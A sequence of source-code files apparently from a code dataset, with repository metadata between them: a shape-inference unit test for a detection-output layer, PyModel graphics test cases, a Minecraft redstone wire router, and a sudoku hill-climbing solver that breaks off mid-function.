('node_2', 'detection_output_1'),
('node_3', 'detection_output_1'),
('detection_output_1', 'node_4')],
{'node_1': {'shape': np.array([1, 34928])},
'node_2': {'shape': np.array([1, 183372])},
'node_3': {'shape': np.array([1, 2, 34928])},
'detection_output_1': {"background_label_id": "0", "clip": "1",
"code_type": "caffe.PriorBoxParameter.CENTER_SIZE",
"confidence_threshold": "0.01", "keep_top_k": "200",
"nms_threshold": "0.5", "num_classes": "21",
"share_location": "1", "top_k": "200",
"variance_encoded_in_target": "0"},
'node_4': {'shape': np.array([1, 1, 200, 7])},
})
multi_box_detection_node = Node(graph, 'detection_output_1')
print(multi_box_detection_node)
multi_box_detection_infer(multi_box_detection_node)
exp_shape = np.array([1, 1, 200, 7])
res_shape = graph.node['node_4']['shape']
for i in range(0, len(exp_shape)):
self.assertEqual(exp_shape[i], res_shape[i])
self.assertEqual(multi_box_detection_node.background_label_id, '0')
self.assertEqual(multi_box_detection_node.clip, '1')
self.assertEqual(multi_box_detection_node.code_type, 'caffe.PriorBoxParameter.CENTER_SIZE')
self.assertEqual(multi_box_detection_node.confidence_threshold, '0.01')
self.assertEqual(multi_box_detection_node.keep_top_k, '200')
self.assertEqual(multi_box_detection_node.nms_threshold, '0.5')
self.assertEqual(multi_box_detection_node.num_classes, 21)
self.assertEqual(multi_box_detection_node.share_location, '1')
self.assertEqual(multi_box_detection_node.top_k, '200')
self.assertEqual(multi_box_detection_node.variance_encoded_in_target, '0')
def test_prior_box_infer_without_top_k(self):
graph = build_graph(nodes_attributes,
[('node_1', 'detection_output_1'),
('node_2', 'detection_output_1'),
('node_3', 'detection_output_1'),
('detection_output_1', 'node_4')],
{'node_1': {'shape': np.array([1, 34928])},
'node_2': {'shape': np.array([1, 183372])},
'node_3': {'shape': np.array([1, 2, 34928])},
'detection_output_1': {"background_label_id": "0", "clip": "1",
"code_type": "caffe.PriorBoxParameter.CENTER_SIZE",
"confidence_threshold": "0.01", "keep_top_k": -1,
"nms_threshold": "0.5", "num_classes": "21",
"share_location": "1", "top_k": -1,
"variance_encoded_in_target": "0"},
'node_4': {'shape': np.array([1, 1, 69856, 7])},
})
multi_box_detection_node = Node(graph, 'detection_output_1')
multi_box_detection_infer(multi_box_detection_node)
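# With top_k == -1 and keep_top_k == -1 the number of kept detections falls back to the
# number of prior boxes: the loc input holds 34928 = 8732 * 4 values and the conf input
# holds 183372 = 8732 * 21, hence the [1, 1, 8732, 7] shape and keep_top_k == 8732 below.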
exp_shape = np.array([1, 1, 8732, 7])
res_shape = graph.node['node_4']['shape']
for i in range(0, len(exp_shape)):
self.assertEqual(exp_shape[i], res_shape[i])
self.assertEqual(multi_box_detection_node.background_label_id, '0')
self.assertEqual(multi_box_detection_node.clip, '1')
self.assertEqual(multi_box_detection_node.code_type, 'caffe.PriorBoxParameter.CENTER_SIZE')
self.assertEqual(multi_box_detection_node.confidence_threshold, '0.01')
self.assertEqual(multi_box_detection_node.keep_top_k, 8732)
self.assertEqual(multi_box_detection_node.nms_threshold, '0.5')
self.assertEqual(multi_box_detection_node.num_classes, 21)
self.assertEqual(multi_box_detection_node.share_location, '1')
self.assertEqual(multi_box_detection_node.top_k, -1)
self.assertEqual(multi_box_detection_node.variance_encoded_in_target, '0')
def test_prior_box_infer_raise_error(self):
graph = build_graph(nodes_attributes,
[('node_1', 'detection_output_1'),
('node_2', 'detection_output_1'),
('node_3', 'detection_output_1'),
('detection_output_1', 'node_4')],
{'node_1': {'shape': np.array([1, 34928])},
'node_2': {'shape': np.array([1, 183372])},
'node_3': {'shape': np.array([1, 3, 34928])},
'detection_output_1': {"background_label_id": "0", "clip": "1",
"code_type": "caffe.PriorBoxParameter.CENTER_SIZE",
"confidence_threshold": "0.01", "keep_top_k": -1,
"nms_threshold": "0.5", "num_classes": "21",
"share_location": "1", "top_k": -1,
"variance_encoded_in_target": 0},
'node_4': {'shape': np.array([1, 1, 69856, 7])},
})
multi_box_detection_node = Node(graph, 'detection_output_1')
self.assertIsNone(multi_box_detection_infer(multi_box_detection_node))
| 56.115385
| 104
| 0.537903
|
8621222cce83ccae2b5fe5d557b5c9ece5f258f8
| 604
|
py
|
Python
|
samples/abp/test_graphics.py
|
jproudlo/PyModel
|
2ab0e2cf821807206725adaa425409b0c28929b7
|
[
"BSD-3-Clause"
] | 61
|
2015-01-29T16:18:51.000Z
|
2021-09-28T10:14:02.000Z
|
samples/abp/test_graphics.py
|
vikstr/PyModel
|
4fff616fe0fd8342c91a42d9db5d4097a179dff8
|
[
"BSD-3-Clause"
] | 2
|
2015-02-04T11:57:53.000Z
|
2021-07-18T20:59:55.000Z
|
samples/abp/test_graphics.py
|
vikstr/PyModel
|
4fff616fe0fd8342c91a42d9db5d4097a179dff8
|
[
"BSD-3-Clause"
] | 34
|
2015-02-04T12:00:29.000Z
|
2022-03-14T07:41:25.000Z
|
"""
ABP analyzer and graphics tests
"""
cases = [
('Run PyModel Graphics to generate dot file from FSM model, no need to use pma',
'pmg ABP'),
('Generate SVG file from dot',
'dotsvg ABP'),
# Now display ABP.dot in browser
('Run PyModel Analyzer to generate FSM from original FSM, should be the same',
'pma ABP'),
('Run PyModel Graphics to generate a file of graphics commands from new FSM',
'pmg ABPFSM'),
('Generate an svg file from the graphics commands',
'dotsvg ABPFSM'),
# Now display ABPFSM.svg in browser, should look the same as ABP.svg
]
| 24.16
| 82
| 0.653974
|
fbe80abb91241ecbc4880e675c8dab97acd79f15
| 13,360
|
py
|
Python
|
compiler/router.py
|
PietPtr/verilog2minecraft
|
911a4e35df80c340747bbc7b53019a90cbac9e3b
|
[
"MIT"
] | null | null | null |
compiler/router.py
|
PietPtr/verilog2minecraft
|
911a4e35df80c340747bbc7b53019a90cbac9e3b
|
[
"MIT"
] | null | null | null |
compiler/router.py
|
PietPtr/verilog2minecraft
|
911a4e35df80c340747bbc7b53019a90cbac9e3b
|
[
"MIT"
] | null | null | null |
import random
import time
from itertools import product
from typing import List, Tuple, Set, Dict, Any, NamedTuple, Optional
from enum import Enum
from amulet import Block
from amulet_nbt import TAG_String
from compiler.graph import Cell
from util.coord import tupleAdd, tupleSub
import heapq
from util.wool import WoolType
FOUR_DIRECTIONS = [(1, 0, 0), (-1, 0, 0), (0, 0, 1), (0, 0, -1)]
ALL_DIRECTIONS = [(x, y + a, z) for x, y, z in FOUR_DIRECTIONS for a in range(-1, 2)]
BOUNDING_DIRECTIONS = list(product(range(-1, 2), range(-2, 3), range(-1, 2)))
class BlockType(Enum):
STONE = "stone"
REDSTONE = "redstone_wire"
REPEATER = "repeater"
GLASS = "glass"
def to_minecraft(self) -> Block:
return Block('minecraft', self.value)
class RoutingBlock:
block_type: BlockType
properties: Dict[str, TAG_String]
def __init__(self, block_type: BlockType, direction: Tuple[Tuple[int, int, int], Tuple[int, int, int]] = None):
self.block_type = block_type
self.properties = dict()
if direction:
self.set_orientation(direction[0], direction[1])
def to_minecraft(self) -> Block:
return Block('minecraft', self.block_type.value, properties=self.properties)
def set_orientation(self, prev: Tuple[int, int, int], this: Tuple[int, int, int]):
delta = tupleSub(this, prev)
if delta == (0, 0, 1):
self.properties['facing'] = TAG_String('north')
elif delta == (0, 0, -1):
self.properties['facing'] = TAG_String('south')
elif delta == (1, 0, 0):
self.properties['facing'] = TAG_String('west')
elif delta == (-1, 0, 0):
self.properties['facing'] = TAG_String('east')
def __str__(self):
return f'RoutingBlock({self.block_type.value})'
def __repr__(self):
return str(self)
class RouteNode(NamedTuple):
point: Tuple[int, int, int]
previous: Optional['RouteNode']
length: int
last_straight: int
def visited_points(self, steps=6) -> Set[Tuple[int, int, int]]:
n = self
result = set()
while n is not None:
result.add(n.point)
n = n.previous
if len(result) >= steps:
return result
return result
class NoRouteFoundException(Exception):
collision: Set[Tuple[int, int, int]]
could_not_expand: Set[Tuple[int, int, int]]
start_dist: int
end_dist: int
def __init__(self, collision_output: Set[Tuple[int, int, int]], start_dist: int, end_dist: int, could_not_expand: Set[Tuple[int, int, int]], msg: str):
self.collision = collision_output
self.start_dist = start_dist
self.end_dist = end_dist
self.could_not_expand = could_not_expand
super(NoRouteFoundException, self).__init__(msg)
class Router:
bounding_box: Set[Tuple[int, int, int]]
bounding_box_static: Set[Tuple[int, int, int]]
bounding_box_route: Dict[Tuple[int, int, int], Set[Tuple[int, int, int]]]
all_routes: Dict[Tuple[int, int, int], List[Tuple[RoutingBlock, Tuple[int, int, int]]]]
blocks_to_route_starts: Dict[Tuple[int, int, int], Set[Tuple[int, int, int]]]
network: Dict[Tuple[int, int, int], List[Tuple[int, int, int]]]
iterations: int
def __init__(self, network: Dict[Tuple[int, int, int], List[Tuple[int, int, int]]], static_bounding_box: Set[Tuple[int, int, int]]):
self.bounding_box = set()
self.bounding_box_static = static_bounding_box
self.all_routes = dict()
self.bounding_box_route = dict()
self.blocks_to_route_starts = dict()
self.network = network
self.connection_points = set()
for endpoints in self.network.values():
self.connection_points.update(endpoints)
for startpoints in self.network.keys():
self.connection_points.add(startpoints)
self.recompute_bounding_box()
def _manhattan(self, a: Tuple[int, int, int], b: Tuple[int, int, int]):
return abs(a[0]-b[0]) + abs(a[1] - b[1]) + abs(a[2] - b[2])
def _find_route(self, original_start: Tuple[int, int, int], start: Tuple[int, int, int], end: Tuple[int, int, int],
maxQ: int, max_depth: int = None, max_counter: int = 100, is_reverse: bool = False) -> RouteNode:
Q = []
self.iterations = 0
last_repeater = 7 if start == original_start else 15
heapq.heappush(Q, (self._manhattan(start, end), 0, RouteNode(start, None, 0, last_repeater)))
best = self._manhattan(start, end)
visited = set()
collision_output: Optional[Set[Tuple[int, int, int]]] = None
collision_dist: int = self._manhattan(start, end) + 100
last_distance = self._manhattan(start, end)
start_distance = self._manhattan(start, end)
could_not_expand = set()
counter = 0
while 0 < len(Q) < maxQ and counter <= max_counter:
self.iterations += 1
heuristic, unused, node = heapq.heappop(Q)
if node.point == end:
return node
current_dist = self._manhattan(node.point, end)
if max_depth and start_distance - current_dist >= max_depth:
return node
if current_dist < best:
best = current_dist
counter = 0
if last_distance <= current_dist:
counter += 1
last_distance = current_dist
previous_points = node.visited_points().union({end})
random.shuffle(ALL_DIRECTIONS)
directions = ALL_DIRECTIONS
if node.last_straight >= 15:
newx, _, newz = tupleSub(node.point, node.previous.point)
directions = [(newx, 0, newz)]
for x, y, z in directions:
pos = tupleAdd((x, y, z), node.point)
positions_to_check = {pos, tupleAdd(pos, (0, 1, 0)), tupleAdd(pos, (0, -1, 0))}
own_bounding = set([tupleAdd(pos, offset) for offset in BOUNDING_DIRECTIONS])
dynamic_bounding_box_intersects = False
for pos_to_check in positions_to_check:
if self.blocks_to_route_starts.get(pos_to_check, set()) - {original_start} != set():
dynamic_bounding_box_intersects = True
dist = self._manhattan(pos_to_check, end)
if collision_output is None or dist < collision_dist:
collision_output = self.blocks_to_route_starts.get(pos_to_check, None)
collision_dist = dist
if pos != end and (
own_bounding.intersection(self.connection_points) - {start, end} != set() or
positions_to_check.intersection(previous_points) != set() or
tupleAdd(pos, (0, 2, 0)) in previous_points or
tupleAdd(pos, (0, -2, 0)) in previous_points or
positions_to_check.intersection(self.bounding_box_static) != set() or
dynamic_bounding_box_intersects
):
could_not_expand.add(pos)
continue
if pos in visited:
continue
visited.add(pos)
# if self._manhattan(pos, end) <= 2:
# print(f'Adding {pos} with distance {self._manhattan(pos, end)}')
last_straight = node.last_straight + 1
delta = tupleSub(pos, node.point)
if node.previous and tupleSub(node.point, node.previous.point) == delta and delta[1] == 0 and delta.count(0) == 2:
last_straight = 1
heapq.heappush(Q, (self._manhattan(pos, end), node.length + 1, RouteNode(pos, node, node.length + 1, last_straight)))
raise NoRouteFoundException(collision_output.copy() if collision_output else None, self._manhattan(start, end), best, could_not_expand,
f'Could not find route between {start} and {end}. Closest: {best}, start: {self._manhattan(start, end)}')
def recompute_bounding_box(self):
self.bounding_box.clear()
self.bounding_box.update(self.bounding_box_static)
for bb in self.bounding_box_route.values():
self.bounding_box.update(bb)
def remove_route(self, route_start: Tuple[int, int, int]):
routes = self.all_routes[route_start]
for block, pos in routes:
if block.block_type in (BlockType.REDSTONE, BlockType.REPEATER):
for offset in BOUNDING_DIRECTIONS:
bounding_pos = tupleAdd(pos, offset)
try:
self.blocks_to_route_starts[bounding_pos].remove(route_start)
except KeyError:
pass
del self.bounding_box_route[route_start]
del self.all_routes[route_start]
self.recompute_bounding_box()
def make_route(self, start: Tuple[int, int, int], end: Tuple[int, int, int], max_counter: int):
best_pos, best = start, self._manhattan(start, end)
last_pos = start
if start in self.all_routes:
for block, pos in self.all_routes[start]:
if block.block_type != BlockType.REDSTONE or tupleSub(pos, last_pos)[1] != 0:
last_pos = pos
continue
last_pos = pos
score = self._manhattan(pos, end)
if score < best:
best_pos, best = pos, score
print(f"Starting route from {best_pos}({start})->{end}")
try:
tmp_node = self._find_route(end, end, best_pos, 150, max_depth=4, max_counter=25, is_reverse=True)
except NoRouteFoundException as e:
if e.start_dist - e.end_dist <= 4:
print('Finding reverse route failed! Throwing exception')
raise e
node = self._find_route(start, best_pos, end, 100000, max_counter=max_counter)
print(f"found route from {best_pos}({start})->{end} in {self.iterations} iterations")
result = []
if start not in self.bounding_box_route:
self.bounding_box_route[start] = set()
last_possible: Optional[Tuple[int, Tuple[int, int, int]]] = None
last_repeated: int = 5
ordered_nodes: List[RouteNode] = []
while node is not None:
ordered_nodes.append(node)
node = node.previous
ordered_nodes = list(reversed(ordered_nodes))
for idx, node in enumerate(ordered_nodes):
wool_idx = sum(start)
if idx+1 < len(ordered_nodes) and ordered_nodes[idx+1].last_straight == 1:
last_possible = (len(result) + 1, node.point)
result.append((RoutingBlock(WoolType.num_to_wool(wool_idx)), (node.point[0], node.point[1] - 1, node.point[2])))
result.append((RoutingBlock(BlockType.REDSTONE), (node.point[0], node.point[1], node.point[2])))
if last_repeated >= 15:
prev = result[last_possible[0]-2][1]
result[last_possible[0]] = (RoutingBlock(BlockType.REPEATER, (prev, last_possible[1])), last_possible[1])
last_repeated = (len(result) - last_possible[0])//2 - 1
last_repeated += 1
for x, y, z in BOUNDING_DIRECTIONS:
pos = tupleAdd((x, y, z), node.point)
self.bounding_box.add(pos)
self.bounding_box_route[start].add(pos)
if pos not in self.blocks_to_route_starts:
self.blocks_to_route_starts[pos] = set()
self.blocks_to_route_starts[pos].add(start)
if start not in self.all_routes:
self.all_routes[start] = []
self.all_routes[start].extend(result)
def get_all_blocks(self) -> List[Tuple[RoutingBlock, Tuple[int, int, int]]]:
result = []
for route in self.all_routes.values():
result.extend(route)
return result
router = None
def create_routes(network: Dict[Tuple[int, int, int], List[Tuple[int, int, int]]],
component_bounding_box: Set[Tuple[int, int, int]]) -> List[Tuple[RoutingBlock, Tuple[int, int, int]]]:
global router
router = Router(network, component_bounding_box)
todo = [start for start in network.keys()]
base = 1
while len(todo) > 0:
print(f'Todo size: {len(todo)}')
start = todo.pop(0)
tries = 0
for end in network[start]:
print(f'Routing {start} -> {end}')
while True:
try:
router.make_route(start, end, min(500 + 1000*tries, 7500))
break
except NoRouteFoundException as e:
print(e)
tries += 1
base += 1
if e.collision is None:
continue
for collision_start in e.collision:
print(f"Removing routes from point: {collision_start}")
router.remove_route(collision_start)
todo.append(collision_start)
random.shuffle(todo)
return router.get_all_blocks()
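# --- Illustrative sketch (not part of the original router) ---------------------
# _find_route above is a best-first search: candidate positions sit in a heap
# ordered by Manhattan distance to the target.  The toy below applies the same
# loop on a flat 2-D grid with a few blocked cells (it reuses the heapq import
# from the top of this module); the grid, the wall and the function name are
# made up and it ignores all redstone-specific constraints.
def _toy_best_first(start, goal, blocked):
    def dist(a, b):
        return abs(a[0] - b[0]) + abs(a[1] - b[1])
    frontier = [(dist(start, goal), start, [start])]
    seen = {start}
    while frontier:
        _, pos, path = heapq.heappop(frontier)
        if pos == goal:
            return path
        for dx, dy in ((1, 0), (-1, 0), (0, 1), (0, -1)):
            nxt = (pos[0] + dx, pos[1] + dy)
            if nxt in blocked or nxt in seen:
                continue
            seen.add(nxt)
            heapq.heappush(frontier, (dist(nxt, goal), nxt, path + [nxt]))
    return None


if __name__ == "__main__":
    # a short wall between (0, 0) and (3, 0) forces the toy search to go around it
    print(_toy_best_first((0, 0), (3, 0), blocked={(1, -1), (1, 0), (1, 1)}))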
| 42.278481
| 155
| 0.586527
|
eef38bea3443926d8d425f77554280cd099d424e
| 21,360
|
py
|
Python
|
MesSudokus/SudokuHillClimbing4.py
|
rubenbuelvas/IFT3335-TP1
|
f7de85e9fecfa55946f996616a9f7043cc182a1b
|
[
"MIT"
] | null | null | null |
MesSudokus/SudokuHillClimbing4.py
|
rubenbuelvas/IFT3335-TP1
|
f7de85e9fecfa55946f996616a9f7043cc182a1b
|
[
"MIT"
] | null | null | null |
MesSudokus/SudokuHillClimbing4.py
|
rubenbuelvas/IFT3335-TP1
|
f7de85e9fecfa55946f996616a9f7043cc182a1b
|
[
"MIT"
] | 1
|
2021-03-02T22:43:31.000Z
|
2021-03-02T22:43:31.000Z
|
# Hill climbing approach to solve a sudoku puzzle
# Inspired by Stochastic search / optimization methods from https://en.wikipedia.org/wiki/Sudoku_solving_algorithms
## Initial code copied from http://norvig.com/sudoku.html
# Will work mostly with grid_values instead of values used in the Norvig sudoku.py (no possible values)
## Throughout this program we have:
## r is a row, e.g. 'A'
## c is a column, e.g. '3'
## s is a square, e.g. 'A3'
## d is a digit, e.g. '9'
## u is a unit, e.g. ['A1','B1','C1','D1','E1','F1','G1','H1','I1'] # unit_type can be 'row', 'column', or 'unit3x3'
## grid is a grid,e.g. 81 non-blank chars, e.g. starting with '.18...7...
## gv = grid_values is a dict of {square: char} with '0' or '.' for empties."""
def cross(A, B):
"Cross product of elements in A and elements in B."
return [a + b for a in A for b in B]
digits = '123456789'
rows = 'ABCDEFGHI'
cols = digits
squares = cross(rows, cols)
unitlist = ([cross(rows, c) for c in cols] +
[cross(r, cols) for r in rows] +
[cross(rs, cs) for rs in ('ABC', 'DEF', 'GHI') for cs in ('123', '456', '789')])
units = dict((s, [u for u in unitlist if s in u])
for s in squares)
peers = dict((s, set(sum(units[s], [])) - set([s]))
for s in squares)
# new variables created
firstsquaresofunit3x3 = cross('ADG', '147') # list containing 9 squares: first per unit: ['A1', 'A4', 'A7', 'D1', ...
searchMethods = {'Brute Force', 'Norvig Heuristic', 'Norvig Improved', 'Hill Climbing'}
emptydigits = '0.' # The digit values representing an empty square
unit_types = ['row', 'column', 'unit3x3'] # unit_type can be 'row', 'column', or 'unit3x3'
print_display = 'nothing' # Values: ["nothing", "minimum", "init grid", "init and final grids", "all solution grids"]
# Text color management
from colorama import Fore, Back, Style # example: print(Fore.BLUE + displaystring)
################ Unit Tests ################
def test():
"A set of tests that must pass."
assert len(squares) == 81
assert len(unitlist) == 27
assert all(len(units[s]) == 3 for s in squares)
assert all(len(peers[s]) == 20 for s in squares)
assert units['C2'] == [['A2', 'B2', 'C2', 'D2', 'E2', 'F2', 'G2', 'H2', 'I2'],
['C1', 'C2', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'C9'],
['A1', 'A2', 'A3', 'B1', 'B2', 'B3', 'C1', 'C2', 'C3']]
assert peers['C2'] == {'A2', 'B2', 'D2', 'E2', 'F2', 'G2', 'H2', 'I2', 'C1', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8',
'C9', 'A1', 'A3', 'B1', 'B3'}
print('All tests pass.')
################ Parse a Grid ################
def grid_values(grid):
"""Convert grid into a dict of {square: char} with '0' or '.' for empties."""
# Example: {'A1': '4', 'A2': '.', 'A3': '.', 'A4': '.', 'A5': '.', 'A6': '.', 'A7': '8', 'A8': '.', 'A9': ...
chars = [c for c in grid if c in digits or c in '0.']
assert len(chars) == 81
return dict(zip(squares, chars))
################ Constraint functions ################
def squares_causing_max_conflicts(gv_init, gv_current, conflicts_grid_values):
"""Will receive a grid filled with values and a conflicts_grid_values and will return:
- a set of all squares having the maximum number of conflits
- the number of conflicts (int) for this maximum"""
maxconflicts = max(conflicts_grid_values)
return conflicts_grid_values[maxconflicts], maxconflicts
def is_initial_squares(gv_init, s):
"""Will receive the initial grid and a square and return True if filled in the initial puzzle"""
# loop through all squares and list non-empty squares (initial puzzle)
return gv_init[s] not in emptydigits
def non_initial_squares_set(gv_init):
"""Will return a set of the squares that were empty in the original puzzle"""
# return {r+c for r in rows for c in cols if is_initial_squares(gv_init, r+c)} #DGIMPROVE? Can write in one line?
set_of_squares = set()
for r in rows:
for c in cols:
if not is_initial_squares(gv_init, r + c):
set_of_squares.add(r + c)
return set_of_squares
def remove_initial_squares_from_set(gv_init, set_of_squares):
"""Will receive a set of squares and will return this set, without the initial squares"""
return set_of_squares - initial_squares_set(gv_init)
def squares_within_unit_list(s, unit_type):
"""Returns a list of the squares within the same unit as s.
unit_type can be 'row', 'column', or 'unit3x3' """
assert unit_type in unit_types
# Note: unitlist is built columns first, so units[s] == [column, row, 3x3 unit]
if unit_type == 'row':
return (units[s][1])
elif unit_type == 'column':
return (units[s][0])
elif unit_type == 'unit3x3':
return (units[s][2])
else:
raise ValueError(f"Unit type {unit_type} not implemented.")
def possible_replacements_within_unit(gv_init, s, unit_type):
"""Returns the squares within the same unit as s that can be replaced, excluding s.
unit_type can be 'row', 'column', or 'unit3x3' """
return (set(squares_within_unit_list(s, unit_type)) - {s}) - initial_squares_set(gv_init)
def initial_squares_set(gv_init):
"""Will receive the initial grid and return a set of all squares not empty"""
# loop through all squares and list non-empty squares (initial puzzle)
set_initialsquares = set()
for r in rows:
for c in cols:
if is_initial_squares(gv_init, r + c):
set_initialsquares.add(r + c)
return set_initialsquares
# def swap2numbers(gv_init, gv_current, conflicts_grid_values):
# """Will take a square with a maximum number of conflicts and swap it randomly within the 3x3 unit with
# another square that isn't part of the initial puzzle. Will then return the new grid_value"""
#
# # Selects randomly one of the squares with the maximum number of conflicts
# s_withmaxconflicts, maxconflicts = squares_causing_max_conflicts(gv_init, gv_current, conflicts_grid_values)
# s1toswap = some(shuffled(s_withmaxconflicts)) # random selection
#
# # Find another square within 3x3 unit and swap randomly without considering the number of conflicts (TO IMPROVE?)
# s2toswap = some(shuffled(possible_replacements_within_unit(gv_init, s1toswap, 'unit3x3')))
# s1value = gv_current[s1toswap]
# gv_current[s1toswap] = gv_current[s2toswap]
# gv_current[s2toswap] = s1value
#
# if print_display != "nothing":
# print(f"Swapped {s1toswap }={gv_current[s1toswap]} and {s2toswap}={gv_current[s2toswap]} (values after the swap)")
#
# return gv_current
def fillgridrandomly(initialgridvalues):
"""Will return a new gridvalues with all empty squares filled randomly without putting the
same digit twice in a 3x3 unit."""
# Reminder: units['C2'] == [['A2', 'B2', 'C2', 'D2', 'E2', 'F2', 'G2', 'H2', 'I2'], #column
# ['C1', 'C2', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'C9'], #line
# ['A1', 'A2', 'A3', 'B1', 'B2', 'B3', 'C1', 'C2', 'C3']] #unit 3x3
newgridvalues = initialgridvalues.copy() # dictionary of initial values. Ex: {'A1': '4', 'A2': '.', 'A3': '.', ...
# Go through all 3x3 units and fill empty squares with random unused digits
for fsou in firstsquaresofunit3x3: # loop through the 9 units.
currentunit = units[fsou][2] # index 3 gives the 3x3 unit
# Loop through all squares within a unit in order to extract initial squares with digits and digits used
listofsquareswithinitialvalue, listofsquareswithoutvalue, digitsused = [], [], ''
for s in currentunit: # loops through the 9 values of the 3x3 unit
d = initialgridvalues[s]
if d in emptydigits: # no value
listofsquareswithoutvalue.append(s)
else:
listofsquareswithinitialvalue.append(s)
digitsused += d # capture all values from initial grid (cannot be replaced)
# Fill empty squares randomly
remainingdigits = list(shuffled(digits.translate({ord(c): '' for c in digitsused}))) # removes digits + shuffle
for s in listofsquareswithoutvalue:
newgridvalues[s] = remainingdigits.pop()
if len(remainingdigits) != 0:
raise ValueError(f"Programming error: remaining digits should be empty but contains: {remainingdigits}")
# print(f"digitsused={digitsused} - remainingdigits={remainingdigits} = newgridvalues={newgridvalues}")
return newgridvalues
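# --- Illustrative note (not part of the original solver) -----------------------
# fillgridrandomly removes the digits already present in a 3x3 unit with
# str.translate: mapping a character's code point to '' deletes that character.
# A minimal, self-contained check of that trick (the digit strings are arbitrary):
def _translate_trick_demo():
    digitsused = '159'
    remainingdigits = '123456789'.translate({ord(c): '' for c in digitsused})
    assert remainingdigits == '234678'
    return remainingdigits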
def countconflicts(gv_init, gv_current):
"""Receives the initial grid and the current grid and returns a total evaluation of the
conflicts in the grid (sum of all conflicts)"""
tmp, total_conflicts, tmp = evalconflicts(gv_init, gv_current)
return total_conflicts
def is_solved(gv_init, gv_current):
"""Returns True is puzzle is solved and False otherwise"""
return countconflicts == 0
def evalconflicts(gv_init, gv_current):
"""Receives the initial grid and the current grid and returns:
- A grid_values of conflicts (dict of {square: nb_of_conflicts})
- A total evaluation of the conflicts in the grid (sum of all conflicts)
- A dictionary representing a list of squares (values) with the number of conflicts (int) as a key
Assumption: there are no conflicts in a 3x3 unit and there is a digit in each square"""
# Reminder: units['C2'] == [['A2', 'B2', 'C2', 'D2', 'E2', 'F2', 'G2', 'H2', 'I2'], #column
# ['C1', 'C2', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'C9'], #line
# ['A1', 'A2', 'A3', 'B1', 'B2', 'B3', 'C1', 'C2', 'C3']] #unit 3x3
conflicts_grid_values = {} # A grid_values of conflicts (dict of {square: nb_of_conflicts})
conflicts_dict = {} # A dictionary representing a list of squares (values) with the number of conflicts as a key
conflictvaluestotal = 0 # Evaluation of the conflicts in the grid
# Will loop through each square
for r in rows:
for c in cols:
conflictvalue = 0
if (gv_init[r + c] not in emptydigits) or (gv_current[r + c] in emptydigits):
conflictvalue = 0 # square filled in the initial puzzle or current grid with empty digits
# print(f"INITIAL r={r} c={c} gv_init[r+c]={gv_init[r+c]}")
else: # square randomly filled in the current grid
# Will calculate the number of conflict
u_column, u_line = units[r + c][0], units[r + c][1] # conflicts in column and conflicts in line
# print(f"CURRENT r={r} c={c}, u_column={u_column}")
for s in u_column:
if (s != r + c) and gv_current[s] == gv_current[r + c]: conflictvalue += 1
for s in u_line:
if (s != r + c) and gv_current[s] == gv_current[r + c]: conflictvalue += 1
# Update dictionaries
conflicts_grid_values[r + c] = conflictvalue # Put the value (int) of the conflict in grid_value
if not conflicts_dict.get(conflictvalue):
conflicts_dict[conflictvalue] = [] # List of squares (values) for this number of conflicts (key)
conflicts_dict[conflictvalue].append(r + c)
conflictvaluestotal += conflictvalue
return conflicts_grid_values, conflictvaluestotal, conflicts_dict
################ Display as 2-D grid ################
def displaygridv(gv_init, gv_current, showconflicts=True):
"""Display grid_values as a 2-D grid. If only display a initialgrid, you can pass currentgrid = initialgrid.
Same as displaygrid(), but used dictionnary gridvalues instead"""
width = 3 # No need to display the possible values
line = '+'.join(['-' * (width * 3)] * 3)
if showconflicts: # Will evaluate conflicts in order to show them
gv_conflicts, nb_conflicts, conflicts_grid_values = evalconflicts(gv_init,
gv_current) # Will initialize a grid_value containing the number of conflicts
# Header of the grid
if showconflicts:
displaystring = '-------- VALUE GRID --------- --- CONFLICTS GRID (' + str(nb_conflicts).ljust(
3) + ') ----\n' # header
else:
displaystring = '-------- VALUE GRID ---------\n'
# Lines
for r in rows:
for c in cols: # Will print all digits of the current row (all columns)
# displays the value_grid
displaystring += (Back.BLACK if gv_init[
r + c] not in emptydigits else Style.RESET_ALL) # Will highlight numbers from initial grid emptydigits = '0.'
displaystring += ' ' + str(gv_current[r + c]) + ' '
displaystring += Style.RESET_ALL + ('|' if c in '36' else '') + (
'\n' if (c in '9') and (not showconflicts) else '') # separator after a group of 3 columns
if showconflicts: # displays the value_grid
displaystring += ' '
for c2 in cols:
displaystring += (Back.BLACK if gv_init[
r + c2] not in emptydigits else Style.RESET_ALL) # Will highlight numbers from initial grid emptydigits = '0.'
displaystring += ' ' + str(gv_conflicts[r + c2]) + ' '
displaystring += Style.RESET_ALL + ('|' if c2 in '36' else '') + (
'\n' if c2 in '9' else '') # Display for a column
if r in 'CF': displaystring = displaystring + line + (' ' + line if showconflicts else '') + '\n'
print(displaystring)
################ Search ################
def solve_grid_values(grid, searchMethod, printdisplay=False):
""" Will solve a puzzle with the appropriate search method"""
# Initializes a puzzle
gv_init = grid_values(grid)
gv_current = fillgridrandomly(gv_init) # Fills all the 3x3 units randomly with unused numbers in unit
if print_display in ["init grid", "init and final grids", "all solution grids"]:
displaygridv(gv_init, gv_current, True)
if searchMethod == 'Hill Climbing':
gv_new = improve_solution_hill_climb_calc_all_swaps3x3(gv_init, gv_current)
if print_display in ["init and final grids", "all solution grids"]: displaygridv(gv_init, gv_new)
else:
raise ValueError(f"Unknown search method {searchMethod}. Available search methods are {searchMethods}")
return gv_init, gv_new
def improve_solution_hill_climb_calc_all_swaps3x3(gv_init, gv_current):
"""Receives a puzzle with conflicts and tries to decrease the number of conflicts by swapping 2 values
using the Hill Climbing method.
Will calculate total conflict for all possible swaps of a pair within a 3x3 unit and then choose the best"""
# Create a list of swappable pairs (tuple) for each unit (not part of initial square)
all_swappables_squares = non_initial_squares_set(gv_init) # Will only consider non initial squares as swappable
set_of_swappable_pairs = set() # Example: {('A3', 'B1'), ('A3', 'B3'), ('A3', 'C3')...
for r in rows:
for c in cols:
if r + c in all_swappables_squares:
# Will loop for all combinations within units
possible_swaps = set(squares_within_unit_list(r + c, "unit3x3")) - {
r + c} # squares in unit, except current
possible_swaps = possible_swaps.intersection(all_swappables_squares) # only swappable squares
for s in possible_swaps:
# Will insert the pairs in a set, and the first element of the pair will always be the smallest.
if r + c < s:
set_of_swappable_pairs.add((r + c, s))
else:
set_of_swappable_pairs.add((s, r + c))
# Will simulate each swap, calculate the total conflicts for each swap and choose the best
best_puzzle = gv_current
